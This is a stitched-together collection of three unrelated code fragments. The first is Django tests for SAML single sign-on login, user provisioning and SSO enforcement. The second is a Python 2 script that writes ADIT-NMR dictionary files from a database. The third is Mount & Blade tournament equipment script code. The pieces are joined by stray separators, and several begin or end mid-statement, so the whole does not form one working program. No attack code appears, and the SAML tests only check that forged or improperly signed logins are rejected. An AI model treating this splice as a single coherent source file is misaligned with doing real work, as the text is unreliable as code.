response = self.client.get("/api/saml/metadata/")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(
response.json(),
self.permission_denied_response("You need to be an administrator or owner to access this resource."),
)
# Login precheck
def test_login_precheck_with_available_but_unenforced_saml(self):
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note Google OAuth is not configured
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": True})
# Initiate SAML flow
def test_can_initiate_saml_flow(self):
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
# Assert user is redirected to the IdP's login page
location = response.headers["Location"]
self.assertIn("https://idp.hogflix.io/saml?SAMLRequest=", location)
def test_cannot_initiate_saml_flow_without_target_email_address(self):
"""
We need the email address to know how to route the SAML request.
"""
with self.assertRaises(AuthMissingParameter) as e:
self.client.get("/login/saml/")
self.assertEqual(str(e.exception), "Missing needed parameter email")
def test_cannot_initiate_saml_flow_for_unconfigured_domain(self):
"""
SAML settings have not been configured for the domain.
"""
with self.assertRaises(AuthFailed) as e:
self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(str(e.exception), "Authentication failed: SAML not configured for this user.")
def test_cannot_initiate_saml_flow_for_unverified_domain(self):
"""
Domain is unverified.
"""
self.organization_domain.verified_at = None
self.organization_domain.save()
with self.assertRaises(AuthFailed) as e:
self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(str(e.exception), "Authentication failed: SAML not configured for this user.")
# Finish SAML flow (i.e. actual log in)
@freeze_time("2021-08-25T22:09:14.252Z") # Ensures the SAML timestamp validation passes
def test_can_login_with_saml(self):
user = User.objects.create(email="<EMAIL>", distinct_id=str(uuid.uuid4()))
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
follow=True,
format="multipart",
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/") # redirect to the home page
# Ensure proper user was assigned
_session = self.client.session
self.assertEqual(_session.get("_auth_user_id"), str(user.pk))
# Test logged in request
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_200_OK)
@freeze_time("2021-08-25T23:37:55.345Z")
def test_saml_jit_provisioning_and_assertion_with_different_attribute_names(self):
"""
Tests JIT provisioning for creating a user account on the fly.
In addition, tests that the user can log in when the SAML response contains attribute names in one of their alternative forms.
For example in this case we receive the user's first name at `urn:oid:172.16.17.32` instead of `first_name`.
"""
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response_alt_attribute_names"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/") # redirect to the home page
# User is created
self.assertEqual(User.objects.count(), user_count + 1)
user = cast(User, User.objects.last())
self.assertEqual(user.first_name, "PostHog")
self.assertEqual(user.email, "<EMAIL>")
self.assertEqual(user.organization, self.organization)
self.assertEqual(user.team, self.team)
self.assertEqual(user.organization_memberships.count(), 1)
self.assertEqual(
cast(OrganizationMembership, user.organization_memberships.first()).level,
OrganizationMembership.Level.MEMBER,
)
_session = self.client.session
self.assertEqual(_session.get("_auth_user_id"), str(user.pk))
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_login_with_improperly_signed_payload(self):
self.organization_domain.saml_x509_cert = """<KEY>
<KEY>"""
self.organization_domain.save()
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
with self.assertRaises(AuthFailed) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id),},
format="multipart",
follow=True,
)
self.assertIn("Signature validation failed. SAML Response rejected", str(e.exception))
self.assertEqual(User.objects.count(), user_count)
# Test logged in request fails
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_signup_with_saml_if_jti_provisioning_is_disabled(self):
self.organization_domain.jit_provisioning_enabled = False
self.organization_domain.save()
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(response.status_code, status.HTTP_200_OK) # because `follow=True`
self.assertRedirects(response, "/login?error_code=jit_not_enabled") # show the appropriate login error
# User is created
self.assertEqual(User.objects.count(), user_count)
# Test logged in request fails
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@freeze_time("2021-08-25T23:53:51.000Z")
def test_cannot_create_account_without_first_name_in_payload(self):
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response_no_first_name"), "r")
saml_response = f.read()
f.close()
user_count = User.objects.count()
with self.assertRaises(ValidationError) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
format="multipart",
follow=True,
)
self.assertEqual(str(e.exception), "{'name': ['This field is required and was not provided by the IdP.']}")
self.assertEqual(User.objects.count(), user_count)
@freeze_time("2021-08-25T22:09:14.252Z")
def test_cannot_login_with_saml_on_unverified_domain(self):
User.objects.create(email="<EMAIL>", distinct_id=str(uuid.uuid4()))
response = self.client.get("/login/saml/?email=<EMAIL>")
self.assertEqual(response.status_code, status.HTTP_302_FOUND)
# Note we "unverify" the domain after the initial request because we want to test the actual login process (not SAML initiation)
self.organization_domain.verified_at = None
self.organization_domain.save()
_session = self.client.session
_session.update(
{"saml_state": "ONELOGIN_87856a50b5490e643b1ebef9cb5bf6e78225a3c6",}
)
_session.save()
f = open(os.path.join(CURRENT_FOLDER, "fixtures/saml_login_response"), "r")
saml_response = f.read()
f.close()
with self.assertRaises(AuthFailed) as e:
response = self.client.post(
"/complete/saml/",
{"SAMLResponse": saml_response, "RelayState": str(self.organization_domain.id)},
follow=True,
format="multipart",
)
self.assertEqual(
str(e.exception), "Authentication failed: Authentication request is invalid. Invalid RelayState."
)
# Assert user is not logged in
response = self.client.get("/api/users/@me/")
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_saml_can_be_enforced(self):
User.objects.create_and_join(
organization=self.organization, email="<EMAIL>", password=<PASSWORD>
)
# Can log in regularly with SAML configured
response = self.client.post(
"/api/login", {"email": "<EMAIL>", "password": <PASSWORD>}
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Forcing only SAML disables regular API password login
self.organization_domain.sso_enforcement = "saml"
self.organization_domain.save()
response = self.client.post(
"/api/login", {"email": "<EMAIL>", "password": <PASSWORD>}
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (saml).",
"attr": None,
},
)
# Login | |
#!/usr/bin/python -u
#
# create dictionary files for ADIT-NMR:
#
# adit_nmr_upload_tags.csv
# bmrb_1.view
# default-entry.cif (actually this one's simply copied from Eldon's svn)
# dict.cif
# mmcif_bmrb.dic
# nmrcifmatch.cif
# table_dict.str
# View-bmrb.cif
#
#
from __future__ import absolute_import
import sys
import os
import sqlite3
import ConfigParser
import datetime
import shutil
if __package__ is None :
__package__ = "nmr-star-dictionary-scripts"
sys.path.append( os.path.abspath( os.path.join( os.path.split( __file__ )[0], ".." ) ) )
from scripts import BaseClass as BaseClass
from scripts import quote4star as quote4star
else :
from . import BaseClass, quote4star
# Python rewrite of the "-ddl" part of Steve's create_schema_3
# High-level view is it's reformatting our stuff in the way ADIT will understand, but the details of
# ADIT are pretty much Double Dutch to me. So don't touch anything here, it was copy-pasted from
# Steve's code and we mostly don't know what it does or why.
#
class AditWriter( BaseClass ) :
# ADIT supports several "views" but we only use 1. Note that it's hardcoded in the bmrb_1.view filename
# in the .properties file
#
VIEWMODE = 1
ADITNMR_TYPES = {
"DATETIME": "date:yyyy-mm-dd",
"FLOAT": "floating-point",
"DOUBLE PRECISION": "floating-point",
"INTEGER": "integer",
"TEXT": "text",
"NCHAR(2)": "2_characters_or_less",
"VARCHAR(2)": "2_characters_or_less",
"CHAR(2)": "2_characters_or_less",
"NCHAR(3)": "3_characters_or_less",
"VARCHAR(3)": "3_characters_or_less",
"CHAR(3)": "3_characters_or_less",
"NCHAR(12)": "12_characters_or_less",
"VARCHAR(12)": "12_characters_or_less",
"CHAR(12)": "12_characters_or_less",
"NCHAR(15)": "15_characters_or_less",
"VARCHAR(15)": "15_characters_or_less",
"CHAR(15)": "15_characters_or_less",
"NCHAR(31)": "31_characters_or_less",
"VARCHAR(31)": "31_characters_or_less",
"CHAR(31)": "31_characters_or_less",
"VARCHAR(80)": "80_characters_or_less",
"CHAR(80)": "80_characters_or_less",
"NCHAR(80)": "80_characters_or_less",
"VARCHAR(127)": "127_characters_or_less",
"CHAR(127)": "127_characters_or_less",
"NCHAR(127)": "127_characters_or_less",
"VARCHAR(255)": "255_characters_or_less",
"CHAR(255)": "255_characters_or_less",
"NCHAR(255)": "255_characters_or_less",
"CHAR(1024)": "1024_characters_or_less",
"NCHAR(1024)": "1024_characters_or_less",
"VARCHAR(1024)": "1024_characters_or_less",
"NCHAR(2048)": "2048_characters_or_less" ,
"VARCHAR(2048)": "2048_characters_or_less"
}
TABLEDICT_COLS = [
"dictionaryseq",
"originalcategory",
"aditCatManFlg",
"aditCatViewType",
"aditsupercatID",
"aditsupercatName",
"aditCatGrpID",
"aditCatViewName",
"aditInitialRows",
"originaltag",
"aditExists",
"aditViewFlags",
"enumeratedFlg",
"itemEnumClosedFlg",
"aditItemViewName",
"aditFormCode",
"dbtype",
"bmrbtype",
"dbnullable",
"internalflag",
"rowIndexFlg",
"lclIDFlg",
"lclSfIDFlg",
"sfIDFlg",
"sfNameFlg",
"sfCategoryFlg",
"sfPointerFlg",
"primaryKey",
"ForeignKeyGroup",
"foreigntable",
"foreigncolumn",
"indexflag",
"dbtablemanual",
"dbcolumnmanual",
"tagCategory",
"tagField",
"loopflag",
"seq",
"dbflg",
"validateflgs",
"valoverrideflgs",
"defaultValue",
"bmrbPdbMatchId",
"bmrbPdbTransFunc",
"variableTypeMatch",
"entryIdFlg",
"outputMapExistsFlg",
"aditAutoInsert",
"datumCountFlgs",
"metaDataFlgs",
"tagDeleteFlgs",
"RefKeyGroup",
"RefTable",
"RefColumn",
"example",
"help",
"description" ]
NMRCIFMATCH_COLS = [
"bmrbPdbMatchId",
"bmrbPdbTransFunc",
"tagCategory",
"tagField",
"originaltag",
"variableTypeMatch",
"entryIdFlg",
"outputMapExistsFlg" ]
# main
#
@classmethod
def make_adit_files( cls, props, connection = None, dburl = None, verbose = False ) :
obj = cls( verbose = verbose )
obj.config = props
outdir = os.path.realpath( props.get( "adit", "output_dir" ) )
if not os.path.isdir( outdir ) :
os.makedirs( outdir )
if connection is None :
obj.connect( url = dburl )
else :
obj.connection = connection
obj.make_view_files()
obj.make_dict_file()
obj.copy_extra_files()
obj.make_table_dict()
obj.make_nmrcifmatch()
return obj
#
#
def __init__( self, *args, **kwargs ) :
super( self.__class__, self ).__init__( *args, **kwargs )
self._curs = None
#### temp view files ##########################################
# these methods return an open tmpfile descriptor, should probably change it to a stringbuffer
#
# category groups: view file
#
def temp_view_category_groups( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_category_groups()\n" )
out = os.tmpfile()
out.write( """
#-------------- GROUP VIEWS -----------------
loop_
_ndb_view_category_group.view_group_id
_ndb_view_category_group.group_view_name
_ndb_view_category_group.group_replicable
_ndb_view_category_group.group_view_class
_ndb_view_category_group.group_view_help_text
_ndb_view_category_group.group_view_mandatory_code
_ndb_view_category_group.group_view_display_code
""" )
sql = "select g.sfCategory,g.catGrpViewName,g.aditReplicable,s.superGrpName,g.catGrpViewHelp," \
+ "g.aditViewFlgs,g.groupID " \
+ "from aditcatgrp g join aditsupergrp s on g.supergrpid = s.supergrpid " \
+ "order by g.groupID"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None :
# sfcat = "" # should never happen
raise Exception( "No saveframe category in aditcatgrp!" )
sfcat = str( row[0] ).strip()
if sfcat == "" :
raise Exception( "Saveframe category is an empty string in aditcatgrp!" )
if row[1] is None : catgrpviewname = ""
else : catgrpviewname = row[1].strip()
if row[2] is None : aditreplicable = ""
else : aditreplicable = row[2].strip()
if row[3] is None : supergrpname = ""
else : supergrpname = row[3].strip()
if row[4] is None : catgrpviewhelp = ""
else : catgrpviewhelp = row[4].strip()
if row[5] is None : aditviewflgs = ""
else : aditviewflgs = row[5][self.VIEWMODE - 1]
out.write( """'%s' '%s' '%s' '%s'
;
%s
;
'%s' 'G0'
""" % (sfcat,catgrpviewname,aditreplicable,supergrpname,catgrpviewhelp,aditviewflgs) )
curs.close()
return out
###################################################
# tag categories view file
#
def temp_view_categories( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_category_groups()\n" )
out = os.tmpfile()
out.write( """
#-------------- CATEGORY VIEWS --------------
loop_
_ndb_view_category.category_id
_ndb_view_category.category_view_name
_ndb_view_category.view_group_id
_ndb_view_category.category_view_mandatory_code
_ndb_view_category.category_view_display_code
_ndb_view_category.category_view_initial_rows
""" )
sql = "select tagCategory,OriginalCategory,aditCatViewName,aditCatManFlg,aditCatViewType," \
+ "aditInitialRows,min(dictionaryseq) from dict " \
+ "where upper(dbFlg)='Y' and upper(aditExists)='Y'" \
+ "group by tagCategory order by min(dictionaryseq)"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None : tagcategory = ""
else : tagcategory = row[0].strip()
if row[1] is None : originalcategory = ""
else : originalcategory = row[1].strip()
if row[2] is None : aditcatviewname = ""
else : aditcatviewname = row[2].strip()
if row[3] is None : aditcatmanflg = ""
else : aditcatmanflg = row[3].strip()
if row[4] is None : aditcatviewtype = ""
else : aditcatviewtype = row[4].strip()
if row[5] is None : aditinitialrows = 1
else : aditinitialrows = int( str( row[5] ).strip() )
# Now the view file output:
out.write( "'%s'\t" % (tagcategory) )
out.write( """
;
%s
;
""" % (aditcatviewname) )
out.write( "'%s'\t" % (originalcategory) )
out.write( "'%s'\t" % (aditcatmanflg) )
out.write( "'%s'\n" % (aditcatviewtype) )
out.write( "%d\n" % (aditinitialrows) )
curs.close()
return out
###################################################
# tags: view file
# Steve's code also generated sd_* (significant digits) columns for all floating fields.
# We don't actually use them in 3.1, so I'm leaving that off.
# (The logic is for any floafitng-pont tag, generate one called <category>._sd_<tag>
# with flags set to H, Y, 1, N, N)
#
def temp_view_items( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_items()\n" )
out = os.tmpfile()
out.write( """
#--------------- ITEM VIEWS -----------------
loop_
_ndb_view_item.category_id
_ndb_view_item.item_name
_ndb_view_item.item_view_name
_ndb_view_item.item_view_mandatory_code
_ndb_view_item.item_view_allow_alternate_value
_ndb_view_item.item_view_form_code
_ndb_view_item.item_sf_id_flag
_ndb_view_item.item_sf_name_flag
""" )
sql = "select tagcategory,tagfield,adititemviewname,description,aditviewflags,itemEnumClosedFlg," \
+ "aditformcode,sfidflg,sfNameflg,dictionaryseq from dict " \
+ "where upper(dbFlg)='Y' and upper(aditExists)='Y' " \
+ "order by tagcategory,dictionaryseq"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[0] is None : tagcategory = ""
else : tagcategory = row[0].strip()
if row[1] is None : tagfield = ""
else : tagfield = row[1].strip()
if row[2] is None : adititemviewname = ""
else : adititemviewname = row[2].strip()
if row[3] is None : description = ""
else : description = row[3].strip()
if (adititemviewname == "na") or (adititemviewname == "") :
adititemviewname = description
if row[4] is None : aditviewflag = ""
else : aditviewflag = row[4][self.VIEWMODE - 1]
# flip this flag because it's the other way around in adit dictionary.
# apparently.
#
if row[5] is None : enumclosedflag = "Y"
elif str( row[5] ).strip().upper() == "Y" : enumclosedflag = "N"
else : enumclosedflag = "Y"
if row[6] is None : formcode = ""
else : formcode = int( str( row[6] ).strip() )
if row[7] is None : sfidflag = "N"
elif str( row[7] ).strip().upper() == "Y" : sfidflag = "Y"
else : sfidflag = "N"
if row[8] is None : sflabelflag = "N"
elif str( row[8] ).strip().upper() == "Y" : sflabelflag = "Y"
else : sflabelflag = "N"
out.write( " '%s'\t" % (tagcategory) )
out.write( "'_%s.%s'\t" % (tagcategory,tagfield) )
out.write( """
;
%s
;
""" % (adititemviewname) )
out.write( "'%s'\t" % (aditviewflag) )
out.write( "'%s'\t" % (enumclosedflag) )
out.write( "%d\t" % (formcode) )
out.write( "'%s'\t" % (sfidflag) )
out.write( "'%s'\n" % (sflabelflag) )
curs.close()
return out
###################################################
# mandatory overrides
#
def temp_view_man_overrides( self ) :
if self._verbose : sys.stdout.write( self.__class__.__name__ + ".temp_view_category_groups()\n" )
out = os.tmpfile()
out.write( """
#-------------- MANDATORY CODE OVERRRIDE ----------------
loop_
_mandatory_code_override.group
_mandatory_code_override.category_id
_mandatory_code_override.item_name
_mandatory_code_override.new_view_mandatory_code
_mandatory_code_override.conditional_category_id
_mandatory_code_override.conditional_item_name
_mandatory_code_override.conditional_item_value
""" )
sql = "select orderOfOperations,sfcategory,categoryId,itemName,newViewMandatoryCode," \
+ "conditionalCatId,conditionalItemName,conditionalItemValue from aditmanoverride " \
+ "order by orderOfOperations"
curs = self.connection.cursor()
curs.execute( sql )
while True :
row = curs.fetchone()
if row is None : break
if row[1] is None : sfcat = ""
else : sfcat = row[1].strip()
if row[2] is None : categoryid = ""
else : categoryid = row[2].strip()
if row[3] is None : itemname = ""
else : itemname = row[3].strip()
if row[4] is None : newviewmandatorycode = ""
else : newviewmandatorycode = row[4].strip()
if row[5] is None : conditionalcatid = "*"
else : conditionalcatid = row[5].strip()
if row[6] | |
Make sure it isn't already available & selected.
(overlay_set_val, ":conditional_obj", ":status"), # Set it to whatever it was stored as.
(overlay_set_display, ":conditional_obj", 1), # Displays the option.
(assign, ":add_option", 0),
(try_end),
## CONDITIONAL CHECKBOXES end
(try_end),
# Set to randomize or remove based on options taken.
(try_begin),
(troop_slot_ge, ":troop", slot_troop_tournament_selections, 1),
(troop_set_slot, ":troop", slot_troop_tournament_always_randomize, 1),
(else_try),
(troop_set_slot, ":troop", slot_troop_tournament_always_randomize, 0),
(try_end),
# Update display of options remaining.
(call_script, "script_tpe_update_presentation"),
(call_script, "script_tpe_weapon_logic", ":troop"), # TPE 1.3 + Limiting options panel reboots
# Update difficulty score.
(call_script, "script_tpe_get_difficulty_value"),
]
),
# script_tpe_clear_selections (blanks out troop template choices)
# Input: arg1 = troop
# Output: none
("tpe_clear_selections",
[
(store_script_param, ":troop_id", 1),
(try_for_range, ":selection", slot_troop_tournament_begin, slot_troop_tournament_end), # Clear out any previously selected options.
(troop_set_slot, ":troop_id", ":selection", 0),
(try_end),
(troop_set_slot, ":troop_id", slot_troop_tournament_selections, 0),
]),
# script_tpe_set_items_for_tournament
# Input:
# Output: none (sets mt_arena_melee_fight items)
("tpe_set_items_for_tournament",
[
(store_script_param, ":troop_id", 1),
(store_script_param, ":troop_team", 2),
(store_script_param, ":troop_entry", 3),
(try_begin),
(eq, "$g_wp_tpe_active", 1),
(assign, ":mission_template", "mt_tpe_tournament_standard"),
(try_end),
# Find the appropriate city settings.
(store_sub, ":city_settings", "$current_town", towns_begin),
(val_mul, ":city_settings", 10),
(store_add, ":slot_lance", ":city_settings", tdp_val_setting_lance),
(store_add, ":slot_archery", ":city_settings", tdp_val_setting_archery),
(store_add, ":slot_onehand", ":city_settings", tdp_val_setting_onehand),
(store_add, ":slot_twohand", ":city_settings", tdp_val_setting_twohand),
(store_add, ":slot_crossbow", ":city_settings", tdp_val_setting_crossbow),
(store_add, ":slot_throwing", ":city_settings", tdp_val_setting_throwing),
(store_add, ":slot_polearm", ":city_settings", tdp_val_setting_polearm),
(store_add, ":slot_horse", ":city_settings", tdp_val_setting_horse),
#(store_add, ":slot_outfit", ":city_settings", tdp_val_setting_outfit),
(troop_get_slot, ":item_normal_lance", tpe_appearance, ":slot_lance"),
(troop_get_slot, ":item_normal_archery", tpe_appearance, ":slot_archery"),
(troop_get_slot, ":item_normal_onehand", tpe_appearance, ":slot_onehand"),
(troop_get_slot, ":item_normal_twohand", tpe_appearance, ":slot_twohand"),
(troop_get_slot, ":item_normal_crossbow", tpe_appearance, ":slot_crossbow"),
(troop_get_slot, ":item_normal_throwing", tpe_appearance, ":slot_throwing"),
(troop_get_slot, ":item_normal_polearm", tpe_appearance, ":slot_polearm"),
(troop_get_slot, ":item_normal_horse", tpe_appearance, ":slot_horse"),
#(troop_get_slot, ":item_normal_outfit", tpe_appearance, ":slot_outfit"),
(try_begin),
(assign, ":equip_check", 0),
(neq, ":item_normal_lance", 0),
(neq, ":item_normal_archery", 0),
(neq, ":item_normal_onehand", 0),
(neq, ":item_normal_twohand", 0),
(neq, ":item_normal_crossbow", 0),
(neq, ":item_normal_throwing", 0),
(neq, ":item_normal_polearm", 0),
(neq, ":item_normal_horse", 0),
#(neq, ":item_normal_outfit", 0),
(assign, ":equip_check", 1),
(else_try),
(eq, ":equip_check", 0),
(display_message, "@ERROR (TPE Design): An invalid item type (normal weapon) is detected."),
(try_end),
(store_add, ":item_enh_lance", ":item_normal_lance", 1),
(store_add, ":item_enh_archery", ":item_normal_archery", 1),
(store_add, ":item_enh_onehand", ":item_normal_onehand", 1),
(store_add, ":item_enh_twohand", ":item_normal_twohand", 1),
(store_add, ":item_enh_crossbow", ":item_normal_crossbow", 1),
(store_add, ":item_enh_throwing", ":item_normal_throwing", 2),
(store_add, ":item_enh_polearm", ":item_normal_polearm", 1),
(store_add, ":item_enh_horse", ":item_normal_horse", 4),
#(store_add, ":item_enh_outfit", ":item_normal_outfit", 100),
(try_begin),
(assign, ":equip_check", 0),
(neq, ":item_enh_lance", 0),
(neq, ":item_enh_archery", 0),
(neq, ":item_enh_onehand", 0),
(neq, ":item_enh_twohand", 0),
(neq, ":item_enh_crossbow", 0),
(neq, ":item_enh_throwing", 0),
(neq, ":item_enh_polearm", 0),
(neq, ":item_enh_horse", 0),
#(neq, ":item_enh_outfit", 0),
(assign, ":equip_check", 1),
(else_try),
(eq, ":equip_check", 0),
(display_message, "@ERROR (TPE Design): An invalid item type (enhanced weapon) is detected."),
(try_end),
(mission_tpl_entry_clear_override_items, ":mission_template", ":troop_entry"),
(try_begin),
(ge, DEBUG_TPE_general, 3), # Verbose display on entry.
(str_store_troop_name, s1, ":troop_id"),
(assign, reg0, ":troop_team"),
(assign, reg1, ":troop_entry"),
(display_message, "@DEBUG (TPE): {s1} is on team {reg0} and should load at entry {reg1}."),
(try_end),
# Do they have any gear arranged for them?
(try_begin),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_always_randomize, 0), # checks for preset equipment settings.
(eq, "$g_wp_tpe_active", 0), # TPE 1.2 + If TPE deactivated by player then everyone gets random stuff.
(call_script, "script_tpe_equip_troop", ":troop_id"), # gears up the troop.
(try_end),
(str_clear, s1),
# Do they get a horse?
(assign, ":give_enhanced_armor", 0),
(assign, ":give_enhanced_weapons", 0),
(try_begin),
# Check if mounts are allowed in this center's tournaments and override if needed.
(store_sub, ":city_offset", "$current_town", towns_begin),
(store_mul, ":city_settings", ":city_offset", 10),
(store_add, ":slot_offset", ":city_settings", tdp_val_setting_horse),
(troop_get_slot, ":mount_chance", tpe_settings, ":slot_offset"),
(ge, ":mount_chance", 1), # City allows mounts at all.
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_horse, 1),
(assign, ":team_horse", ":item_enh_horse"),
(val_add, ":team_horse", ":troop_team"), # TESTING - Commented since I don't have different colored warhorses yet.
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_horse"),
(str_store_string, s1, "@{s1} enhanced horse (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_horse, 1),
(assign, ":team_horse", ":item_normal_horse"),
(val_add, ":team_horse", ":troop_team"), # TESTING - Commented since I don't have different colored warhorses yet.
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_horse"),
#(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_normal_horse),
(str_store_string, s1, "@{s1} horse (+1),"), # debugging
(try_end),
(else_try),
# Give the troop something else if they had mounts enabled, but can't use them.
(troop_slot_eq, ":troop_id", slot_troop_tournament_horse, 1),
(eq, ":mount_chance", 0),
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_armor, 0),
(assign, ":give_enhanced_armor", 1),
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 0),
(assign, ":give_enhanced_weapons", 1),
(try_end),
(try_end),
# Do they have enhanced armor?
(try_begin),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_armor, 1),
(eq, ":give_enhanced_armor", 1),
(assign, ":team_armor", wp_tpe_enhanced_armor),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} enhanced armor (+1),"), # debugging
(assign, ":team_helmet", wp_tpe_enhanced_helmet),
(val_add, ":team_helmet", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_helmet"),
(str_store_string, s1, "@{s1} enhanced helmet,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_enhanced_boots),
(str_store_string, s1, "@{s1} enhanced boots,"), # debugging
(else_try),
(assign, ":team_armor", wp_tpe_default_armor),
(val_add, ":team_armor", ":troop_team"),
(str_store_string, s1, "@{s1} armor,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(assign, ":team_helmet", wp_tpe_normal_helmet), # Section commented out to prevent normal armor having a helm.
(val_add, ":team_helmet", ":troop_team"),
(str_store_string, s1, "@{s1} helmet,"), # debugging
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_helmet"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", wp_tpe_normal_boots),
(str_store_string, s1, "@{s1} boots,"), # debugging
(try_end),
# Do they have an enhanced shield?
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_shield, 1),
(assign, ":team_armor", wp_tpe_enhanced_shield),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} enhanced shield (+1),"), # debugging
(else_try),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_onehand, 1),
(troop_slot_eq, ":troop_id", slot_troop_tournament_throwing, 1),
(assign, ":team_armor", wp_tpe_normal_shield),
(val_add, ":team_armor", ":troop_team"),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":team_armor"),
(str_store_string, s1, "@{s1} shield,"), # debugging
(try_end),
# Lances
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(this_or_next|troop_slot_eq, ":troop_id", slot_troop_tournament_enhanced_weapons, 1),
(eq, ":give_enhanced_weapons", 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_enh_lance"),
(str_store_item_name, s2, ":item_enh_lance"),
(str_store_string, s1, "@{s1} enhanced {s2} lance (+2),"), # debugging
(else_try),
(troop_slot_eq, ":troop_id", slot_troop_tournament_lance, 1),
(mission_tpl_entry_add_override_item, ":mission_template", ":troop_entry", ":item_normal_lance"),
(str_store_item_name, s2, ":item_normal_lance"),
(str_store_string, s1, "@{s1} {s2} (+1),"), # debugging
(try_end),
# Bows
(try_begin),
(troop_slot_eq, ":troop_id", slot_troop_tournament_bow, 1),
